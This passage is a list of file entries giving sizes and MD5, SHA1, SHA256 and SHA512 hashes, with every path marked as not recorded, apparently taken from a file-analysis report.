  SHA512: a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

- (path not recorded)
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- (path not recorded)
  Filesize: 92KB
  MD5: a90e4f6bdd44a71e2246160693884539
  SHA1: 940ebec474e0b4d87dc4f06f37a1d32d2315cf56
  SHA256: b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
  SHA512: 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937

- (path not recorded)
  Filesize: 33KB
  MD5: ce008446a6fa668f1482d5dbf86db7a5
  SHA1: e44d92971edbeb71bfd53e38b2d5dd31fe0dc216
  SHA256: b8cf553f561a7594907f7407c23d79b21c175472f56a5bc55a377c6f3c908d4d
  SHA512: 980c5a16696eabe5f1c660750be914cd2df4e72111a416ad1d53efd8cb29852b64d5ffdb4e5286543aaa3b76ba599243f768c6338f23af0163dea9107e4cdd6d

- (path not recorded)
  Filesize: 86KB
  MD5: d1aa9832a89fcef4fe32df07d43736c0
  SHA1: 75b1fd07a8a8935cfa8ab8fa816aebddbeefd1c5
  SHA256: c82c8c416aec3df58bab4ec5b133a7a7ce2a64766c3ba7eab9d33e86be58a4ce
  SHA512: bca7f2a3f5d4316cc96d73887ba350cc44fda87eaf609c535cf2eb91cc62bc04003303034bead8f759b531bc3b565d515d731584d64282d273a81c56ec1a9a84

- (path not recorded)
  Filesize: 92KB
  MD5: 45ea343e335d2d6400ccbc1e3fc85f11
  SHA1: 7f2267d1f27a076e284696c30a4cf4768fd1a52f
  SHA256: f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203
  SHA512: c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1

- (path not recorded)
  Filesize: 85KB
  MD5: dd87528a716d48530d8cc7fe6bec3386
  SHA1: 89351d5b60846912f216acb58219397fc1ca9aee
  SHA256: eb2b5d61c9a6d7e26f81da14df0c063fb2c71ba294389fce6076a0ae52356244
  SHA512: 9f203bbb162250aab7cd643ac72f430ddd761c063d5a2fd6fd03cdf7707a6e6c287bfeba4b675d4173c92641573313d5f765afefa0c3d159e196542b10d6b861

- (path not recorded)
  Filesize: 153KB
  MD5: f37938f3bb58f159e1d46403c6e0b10a
  SHA1: 78948994aa6c388b4356ee1eeb94b20cdfcda845
  SHA256: 634a0173ea818d5b152fcfbd8cc4b5d05fb381dac744b251a7b0184b2d7ddac8
  SHA512: 6345f8f659fbcd16bb9f42cb68270f9ab275a76ba0acc74cb55a1d6c1bfade06c0cf1d2fbd6b671cb0445869714a19bb8d08ac71ca57fdd21a941fe0b28773a5

- (path not recorded)
  Filesize: 17KB
  MD5: eef7a52c4e6fc20cd22306b007b9b4c0
  SHA1: 700f935a3e75a0001654fae0b4d30af5044329c0
  SHA256: 1e5f96939d4d1af801f771de3da5e285c0c7dc4b376dfc127b7320926d0e0444
  SHA512: 4459e6f019a906c13bd41dc3664e0dc4567b8cd941712ecd79e3888fadce517ac640767f80d92fbc57963da5b8e648e1f6a6ec13efe1f37f3bc21b672ac70c70

- (path not recorded)
  Filesize: 1KB
  MD5: e6ccb03a4cd3aa39359361eae696ab9b
  SHA1: ac58548d25dee7cc1c6f6b6eff1d53fabfc0aab3
  SHA256: 7cc9da41083cd2640ef63e8190fa4d426e9d03a930348d3dbbcb4074f39e91ba
  SHA512: 4e4ee151f1104cc1511b02d8140287b0c489bd21f1491f7b9f0229a31091572e211bcee98f3ec0dc29d8bb0169327b7063ad1a376918548f51aba32931b138cd

- (path not recorded)
  Filesize: 4KB
  MD5: 041d958d503620fcee33aab200c8e17a
  SHA1: 6e6b21612723294622356d6897968faa05439b81
  SHA256: 1f84a7ebd0887401a73b3152d38b4ac6dd5b5203189744a645ca59c3e3f4dbfb
  SHA512: f6ce0c7d592b5dd8c47fc5eded575be3ac74bb5ad874dfef8091fdbbf957487a0e74be68f229dd2849ec82b7479ec539043cea05687525af0849cbd879dce181

- (path not recorded)
  Filesize: 5KB
  MD5: 9b5571670ab852ab22ef3810cfd70159
  SHA1: 8c7972a29379b57f9e40d8b7af796eb938cf8670
  SHA256: 6e1a3a18373c5b55d3dd1e75c210bb15ede6de748c3b88af5858120144558ab1
  SHA512: 01e593ae4febe272b7f3fc303ba130797e1d36335716627ebd667d8c347302ca17d252f2cda37a6cb15906c12ba8c103e480b8a2ce97290a81cea500bb66a092